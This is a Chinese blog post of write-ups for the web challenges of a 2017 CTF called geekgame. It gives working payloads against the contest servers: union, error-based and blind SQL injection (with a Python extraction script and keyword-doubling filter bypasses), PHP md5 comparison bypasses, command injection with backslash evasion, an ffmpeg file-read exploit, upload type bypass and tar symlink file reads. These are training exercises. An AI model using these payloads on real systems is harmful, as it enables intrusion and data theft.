Sky's blog

geekgame部分web题解

Word count: 1,667 / Reading time: 9 min
2017/10/28 Share

故道白云

简单的注入,还要跨库是最坑的。。。。。。。

1
http://game.sycsec.com:2006/?submit=submit&id=-1' union select 1,(select f4ag from f1ag.flag) -- 1

得到flag:SYC{HACKEr_By-cL0und}

粗心的李超

存在index.php.bak泄露

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
<?php
include "flag.php";
if(isset($_POST['user'])&&isset($_POST['pass'])){
if($_POST['user']=='admin'&&$_POST['pass']=='lc19971117'){
setcookie("user","admin");
}
}
if(isset($_COOKIE['user'])){
if($_COOKIE['user']=="admin"){
echo $flag;
}else{
echo "who are u ?";
}
}else{
setcookie("user","guest");
}
?>

登录即可获得flag:SYC{just_brute_is_ok!}

Buy me a Tesla

点击购买,然后抓包

1
submit=%E8%AE%A2%E8%B4%AD&value=1602500&yue=10&sign=WkVkV2VtSkhSazVpTWxKc1lrWm9OMlJ0Um5Oa1YxVTJUVlJaZDAxcVZYZE5RM2czWkZoT2JHTnVUVzVqZVVJMVpGZFZOazFVUWprPQ%3D%3D

对sign进行base64解密多次,得到:
teslaModelX{value:1602500,{users's yue:10}
修改后得到payload:

1
submit=%E8%AE%A2%E8%B4%AD&value=1602500&yue=100000000000&sign=%57%6b%56%6b%56%32%56%74%53%6b%68%53%61%7a%56%70%54%57%78%4b%63%31%6c%72%57%6d%39%4f%4d%6c%4a%30%55%6d%35%4f%61%31%59%78%56%54%4a%55%56%6c%4a%61%5a%44%41%78%63%56%5a%59%5a%45%35%52%4d%32%63%7a%57%6b%5a%6f%54%32%4a%48%54%6e%56%55%56%7a%56%71%5a%56%56%4a%4d%56%70%47%5a%46%5a%4f%61%7a%46%56%55%56%68%6b%54%6c%4a%46%52%6a%4e%55%56%56%4a%43%5a%44%41%78%52%56%46%59%5a%47%31%56%56%44%41%35

即可得到flag:<script>alert("购买成功!您的订单SYC{KeYiGeiWoMaiYiGeZhenDeTeslaMa?}")</script>

PHP的悖论1

题目描述

1
if ($_POST['s1'] !== $_POST['s2'] && md5($_POST['s1']) === md5($_POST['s2'])) { echo $flag; }

简单的md5的漏洞绕过
post:s1[]=1&&s2[]=2即可
flag:SYC{Th3_b33t_l4n_1nth3w0rld!!!}

PHP的悖论2

题目描述

1
if ($_POST['s1'] !== $_POST['s2'] && md5($_POST['s1']) == md5($_POST['s2'])) { echo $flag; }

简单的php弱等于,找俩0e开头的md5即可
post:s1=QNKCDZO&&s2=s878926199a
flag:SYC{Y0u_g0th3w4y_to_k111==}

视频播放器

看代码提示:

1
<!-- Powered by ffmpeg. ffmpeg shi sha?? baidu yi xia, ni jiu zhi dao.-->

百度ffmpeg
下载脚本 https://github.com/neex/ffmpeg-avi-m3u-xbin/blob/master/gen_xbin_avi.py
运行脚本:python3 gen_xbin_avi.py file:///var/www/html/index.php sky.avi
上传sky.avi,即可看见flag:SYC{WhatIsExpFuckNoLiaoDe???}

iPhone X

改UA头即可,后来还提示需要加一个XFF

1
2
X-Forwarded-For: 127.0.0.1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS X_2 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A403 Safari/8536.25 Chrome/59.0.3071.86 Safari/537.36

然后可以得到flag:

1
2
3
4
<h1>Only iPhone X could access this website.</h1>
<hr>
<br>
OK, you have buy the iphone X using the time machine<br>SYC{UA_AND_IP_COULD_BE_FORGED_!!!}

Clound的错误

先看源码,发现问题

1
2
3
4
5
6
7
其实我是一个内向的人 我把我想说的话都隐藏起来 但是今天我要 大胆的说出来
其实...其实...
其实我是个SQL注入
我要把我的"错误"全部表现出来
-->
<!-- sycid=1 -->
<!-- hacked by cLound -->

还是简单的注入,要跨库

1
http://game.sycsec.com:2007/?sycid=1' and 1=updatexml(1,concat(0x7e,(select f4ag from f1ag.flag),0x7e),1) -- 1

得到flag:SYC{Err0r_sql_inj}

G胖万岁

http://game.sycsec.com:2008/Steam/1.php?type=DESC
分析url,应该是类似于下的sql语句:
select * from 表 order by 字段 $type;
所以我们需要影响排序的顺序:
本地测试了一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
select * from users order by id DESC;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| 4 | zjgcjy | 777 |
| 3 | jarbeen | 666 |
| 2 | sky | skyiscool |
| 1 | admin | skyiscool |
+----+----------+-----------+

mysql> select * from users order by id;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| 1 | admin | skyiscool |
| 2 | sky | skyiscool |
| 3 | jarbeen | 666 |
| 4 | zjgcjy | 777 |
+----+----------+-----------+

mysql> select * from users order by id ^1;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| 1 | admin | skyiscool |
| 3 | jarbeen | 666 |
| 2 | sky | skyiscool |
| 4 | zjgcjy | 777 |
+----+----------+-----------+

mysql> select * from users order by id ^0;
+----+----------+-----------+
| id | username | password |
+----+----------+-----------+
| 1 | admin | skyiscool |
| 2 | sky | skyiscool |
| 3 | jarbeen | 666 |
| 4 | zjgcjy | 777 |
+----+----------+-----------+

可以看到用^可以改变排序情况
那么我们在题目中试一下:

1
2
3
4
5
6
7
http://game.sycsec.com:2008/Steam/1.php?type=^1 limit 1
只出现了游戏
Witcher III

http://game.sycsec.com:2008/Steam/1.php?type=^0 limit 1
只出现了游戏
Portal2

然后可以利用这一点构造注入
注入脚本:

1
2
3
4
5
6
7
8
9
10
11
12
13
#!/usr/bin/env python
# Author:Sublime
# coding:utf-8
import requests
res = ''
for x in range(1, 30):
for y in range(33, 127):
url = """http://game.sycsec.com:2008/Steam/1.php?type=^((ascii(substr((select f14g_is from g4m3e1.F1ag_1s_h3re limit 0,1),"""+str(x)+""",1)))="""+str(y)+""") limit 1"""
f = requests.get(url=url)
if 'Witcher' in f.content:
res += chr(y)
print res
break

运行后即可得到flag:SYC{ShutupandBuy1t}
注意跨库……这比赛的所有注入貌似都跨库啊= =

Clound的错误2

这题就是加了过滤
空格用%0a绕过
or,and,select,from等双写绕过即可
容易得到payload:

1
http://game.sycsec.com:2010/?sycid=1'%0aaandnd%0a1=updatexml(1,concat(0x7e,(selselectect%0af4ag%0afrfromom%0af1ag.flag),0x7e),1)%0aaandnd%0a'a'='a

即可得到flag:SYC{Err0R_sQl_inj2}

大大的标题

发现1.zip源码泄露,审计一下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
<?php 
if( isset( $_POST[ 'submit' ] ) ) {
$target_path = "./upload/";
$target_path .= basename( $_FILES[ 'file' ][ 'name' ] );
$file_name = $_FILES[ 'file' ][ 'name' ];
$file_ext = substr( $file_name, strrpos( $file_name, '.' ) + 1);
$file_type = $_FILES[ 'file' ][ 'type' ];
$file_size = $_FILES[ 'file' ][ 'size' ];
$allow_ext=array("jpg","jpeg","png");
$succe_ext=array("php","php3","php4","php5","phtml","pht");
$flag="flag";


if( ( $file_type == "image/jpeg" || $file_type == "image/png" ) &&
( $file_size < 100000 ) ) {

if(in_array($file_ext, $allow_ext)){
if( !move_uploaded_file( $_FILES[ 'file']['tmp_name' ], $target_path ) ) {
echo "<center><h2>upload file error!!</h2></center>";
}
else {

echo "<center><h2>{$target_path} succesfully uploaded!</h2></center>";
}

}
if(in_array($file_ext,$succe_ext)){
echo "<center><h3>".$flag."</h3></center>";
system("rm -f ".$_FILES['file']['tmp_name']);
}

}
else {

echo "only accept JPG JPEG or PNG images and size < 100000";
}
}

?>

发现修改Content-Type: image/jpeg即可,然后上传"php","php3","php4","php5","phtml","pht"任意一种后缀都可以拿到flag
flag:SYC{CLound-upL0ad}

你的名字

题目比较坑,一开始以为是注入,后来发现是命令注入:

1
2
3
http://game.sycsec.com:2012/?name=%0apwd
回显
你的名字是: /var/www/html

然后发现大量指令都被过滤了,学习了一波bash小特性的绕过
发现\可以绕过关键词

1
2
3
http://game.sycsec.com:2012/?name=%0al\s
回显
你的名字是: index.php

然后就很痛苦,找了很久没找到flag,后来猜想是不是用了隐藏文件

1
2
3
http://game.sycsec.com:2012/?name=%0afin\d%09
回显
你的名字是: . ./.YoufindMeButYouCanN0tReadMe.swp ./index.php

然后cat获取flag

1
2
3
4
http://game.sycsec.com:2012/?name=%0aca\t%09.Youfin\dMeButYouCanN0tReadMe.swp
回显
你的名字是:
b0VIM 7.4�jrootiZwz9aqtiwio4jjeu737peZ/var/www/html/YoufindMeButYouCanN0tReadMe U3210#"! Utpad���SYC{Wo_ai_he_kou_jue_jiu}

快捷方式的妙用

题目title很明显告诉你了是tar
所以应该是上传tar包,他会解压你的tar,然后cat你的解压文件
所以思路很清晰了

1
2
ln -s /var/www/html/upload.php sky.txt
tar -cf sky.tar sky.txt

可以映射他的upload.php到sky.txt然后压缩成tar,再上传,即可获取源码
然后获得flag路径

1
2
ln -s /home/flag_is_here_hahaha sky.txt
tar -cf sky.tar sky.txt

然后再次上传后获取flag:SYC{Bust_1inK!!!}

CATALOG
  1. 1. 故道白云
  2. 2. 粗心的李超
  3. 3. Buy me a Tesla
  4. 4. PHP的悖论1
  5. 5. PHP的悖论2
  6. 6. 视频播放器
  7. 7. iPhone X
  8. 8. Clound的错误
  9. 9. G胖万岁
  10. 10. Clound的错误2
  11. 11. 大大的标题
  12. 12. 你的名字
  13. 13. 快捷方式的妙用